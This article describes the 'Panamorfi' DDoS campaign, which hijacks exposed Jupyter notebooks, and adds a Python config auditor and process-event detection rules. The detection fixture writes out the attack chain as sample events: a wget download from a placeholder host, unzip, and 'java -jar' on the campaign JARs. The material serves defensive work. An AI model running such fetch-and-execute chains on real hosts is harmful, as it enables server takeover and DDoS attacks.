Utilizing Minecraft DDoS Package in Panamorfi Campaign through Jupyter Notebook and Discord


The Panamorfi DDoS Campaign: Exploiting Misconfigured Jupyter Notebooks

A new Distributed Denial of Service (DDoS) campaign, dubbed “Panamorfi,” has been unleashed by threat actor yawixooo, targeting misconfigured Jupyter notebooks exposed online. This campaign poses a significant threat to data practitioners such as data engineers, data analysts, and data scientists who heavily rely on Jupyter notebooks for their work.

The attack operation, as reported by researchers from Aqua Nautilus, involves the threat actor gaining initial access to internet-facing notebooks and downloading a zip file from a file-sharing platform. The zip file, approximately 17 MB in size, contains two JAR files, conn.jar and mineping.jar, which are used to launch a TCP flood DDoS attack on target servers.

The conn.jar file, which contains the initial execution code, leverages Discord to control the DDoS attack, while the mineping.jar file serves as a Minecraft server DDoS tool. The attackers have configured the tool to write the results of the attack to a Discord channel, aiming to overwhelm the target server and consume its resources.

To mitigate such attacks, researchers recommend restricting access to Jupyter notebooks through secure configuration, blocking execution of the files associated with the campaign, limiting code execution, and applying the latest security patches regularly. It is also advised to refrain from storing sensitive information or credentials in Jupyter notebooks, so that a compromised notebook does not hand the threat actor further access.
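The "misconfigured, internet-facing notebook" that gives this campaign its initial access usually comes down to a handful of settings in the Jupyter server config. The following added example (not Aqua Nautilus' tooling, and not code from the report) audits such a config file statically for the exposures that matter here: a bind on every interface, authentication switched off, and kernels running as root. The trait names are the real jupyter_server ones (`c.ServerApp.ip`, `token`, `password`, `allow_root`, with legacy `c.NotebookApp.*` accepted too); the two sample configs and the password placeholder are constructed for this demonstration.

```python
"""Audit a Jupyter server config for the exposure the Panamorfi campaign relies on.

Added example, not Aqua Nautilus' code. Assignments are read with the ast
module, so the config file is never executed by the auditor."""
import ast

APPS = ("ServerApp", "NotebookApp")          # jupyter_server and legacy notebook names
PUBLIC_BINDS = {"0.0.0.0", "*", "::", ""}    # values that listen on every interface


def load_settings(config_text: str) -> dict:
    """Collect c.<App>.<trait> = <literal> assignments without executing the file."""
    settings = {}
    for node in ast.walk(ast.parse(config_text)):
        if not isinstance(node, ast.Assign):
            continue
        for target in node.targets:
            if (isinstance(target, ast.Attribute)
                    and isinstance(target.value, ast.Attribute)
                    and isinstance(target.value.value, ast.Name)
                    and target.value.value.id == "c"):
                try:
                    settings[(target.value.attr, target.attr)] = ast.literal_eval(node.value)
                except (ValueError, SyntaxError):
                    pass  # computed value (e.g. a passwd(...) call): cannot judge statically
    return settings


def audit(config_text: str) -> list:
    """Return findings as dicts with 'id' and 'detail'; an empty list means nothing flagged."""
    settings = load_settings(config_text)

    def get(trait, default=None):
        for app in APPS:
            if (app, trait) in settings:
                return settings[(app, trait)]
        return default

    findings = []
    ip = get("ip", "localhost")  # jupyter_server default is localhost
    if ip in PUBLIC_BINDS:
        findings.append({"id": "public-bind",
                         "detail": f"ip={ip!r} listens on every interface"})

    # An unset token is auto-generated; token = '' disables token auth entirely.
    has_password = bool(get("password")) or \
        bool(settings.get(("PasswordIdentityProvider", "hashed_password")))
    if get("token") == "" and not has_password:
        findings.append({"id": "no-auth",
                         "detail": "token disabled and no password: anyone reaching the port gets a kernel"})

    if get("allow_root") is True:
        findings.append({"id": "allow-root",
                         "detail": "kernels run as root; a compromised notebook owns the host"})
    return findings


# Constructed sample: the kind of config that ends up exposed on the internet.
WEAK_CONFIG = """
c = get_config()
c.ServerApp.ip = '0.0.0.0'
c.ServerApp.port = 8888
c.ServerApp.open_browser = False
c.ServerApp.token = ''
c.ServerApp.password = ''
c.ServerApp.allow_root = True
"""

# Constructed sample: same server, bound locally and behind a password.
# The hash is a placeholder; a real one comes from `jupyter server password`.
HARDENED_CONFIG = """
c = get_config()
c.ServerApp.ip = '127.0.0.1'
c.ServerApp.port = 8888
c.ServerApp.open_browser = False
c.ServerApp.allow_root = False
c.ServerApp.password = 'argon2:PLACEHOLDER_HASH'
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(text))
```

Run it against `~/.jupyter/jupyter_server_config.py` (or the legacy `jupyter_notebook_config.py`) before exposing a server; the weak sample above produces all three findings, the hardened one none. Settings that are passed on the command line rather than in the file are not seen by this check.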

The researchers were able to successfully halt the Panamorfi attack by implementing a runtime policy that blocks the execution of the conn.jar file, effectively putting an end to the entire attack. Data practitioners are urged to take special precautions and safeguard their Jupyter notebooks from potential threats like Panamorfi.
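The runtime policy described above comes down to recognising the campaign's execution chain on the host: a notebook kernel fetching an archive, then launching `java -jar` on conn.jar or mineping.jar. The following added example (not Aqua Nautilus' policy engine, and not code from the report) applies that logic to process-execution events. Only the two JAR names come from the report; the JSON event schema (`pid`, `cmdline`, `parent_cmdline`), the rule that a kernel-spawned child is recognised by `ipykernel_launcher` or `jupyter` in its parent's command line, and all sample events are constructed for this demonstration.

```python
"""Process-execution rules for the Panamorfi chain: stage (download a zip from a
notebook kernel), run (java -jar from a kernel), payload (conn.jar / mineping.jar).

Added example, not Aqua Nautilus' tooling. Event schema and samples are constructed."""
import json
import os
import shlex

CAMPAIGN_JARS = {"conn.jar", "mineping.jar"}            # names taken from the report
NOTEBOOK_MARKERS = ("ipykernel_launcher", "jupyter")    # assumption: how a kernel child is identified


def is_notebook_child(event: dict) -> bool:
    """True when the process was spawned by a Jupyter kernel or server."""
    parent = event.get("parent_cmdline", "")
    return any(marker in parent for marker in NOTEBOOK_MARKERS)


def classify(event: dict):
    """Return (action, reason) for one process-execution event, or None if benign."""
    try:
        argv = shlex.split(event.get("cmdline", ""))
    except ValueError:
        return None  # unbalanced quotes in cmdline: do not crash the pipeline
    if not argv:
        return None
    prog = os.path.basename(argv[0])
    names = {os.path.basename(a) for a in argv}

    # Block: the campaign's own payloads, regardless of who launched them.
    hits = names & CAMPAIGN_JARS
    if hits:
        return ("block", "campaign-jar:" + ",".join(sorted(hits)))

    if not is_notebook_child(event):
        return None  # the remaining rules only concern code run from a notebook

    # Alert: any JAR launched from a kernel (how the payloads start before they are known).
    if prog == "java" and "-jar" in argv:
        return ("alert", "notebook-java-jar")

    # Alert: a kernel pulling an archive from the internet (the staging step).
    if prog in {"curl", "wget"} and any(a.lower().endswith(".zip") for a in argv):
        return ("alert", "notebook-archive-download")
    return None


def evaluate(log_lines):
    """Run classify() over JSON-lines process events; returns [(pid, action, reason)]."""
    verdicts = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        result = classify(event)
        if result:
            verdicts.append((event["pid"], *result))
    return verdicts


# Constructed sample events; the download host is a placeholder, not the real file-sharing site.
KERNEL = "python -m ipykernel_launcher -f /run/user/1000/jupyter/kernel.json"
SAMPLE_EVENTS = [
    json.dumps({"pid": 4101, "parent_cmdline": "jupyter-lab --ip=0.0.0.0", "cmdline": KERNEL}),
    json.dumps({"pid": 4120, "parent_cmdline": KERNEL,
                "cmdline": "wget -q https://files.example.invalid/archive.zip -O /tmp/archive.zip"}),
    json.dumps({"pid": 4121, "parent_cmdline": KERNEL, "cmdline": "unzip /tmp/archive.zip -d /tmp"}),
    json.dumps({"pid": 4122, "parent_cmdline": KERNEL, "cmdline": "java -jar /tmp/conn.jar"}),
    json.dumps({"pid": 4123, "parent_cmdline": KERNEL, "cmdline": "java -jar /tmp/mineping.jar"}),
    json.dumps({"pid": 4130, "parent_cmdline": "bash", "cmdline": "java -jar /opt/app/service.jar"}),
    json.dumps({"pid": 4131, "parent_cmdline": KERNEL, "cmdline": "java -jar /tmp/unknown.jar"}),
]

if __name__ == "__main__":
    for verdict in evaluate(SAMPLE_EVENTS):
        print(*verdict)
```

The legitimate `java -jar` from a shell (pid 4130) produces nothing, the two campaign JARs are blocked by name, and the archive download plus the unknown JAR from a kernel raise alerts. Matching on file name is the cheapest rule and the easiest to evade by renaming; the kernel-parent rules are what keep the detection useful once the payload is renamed.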
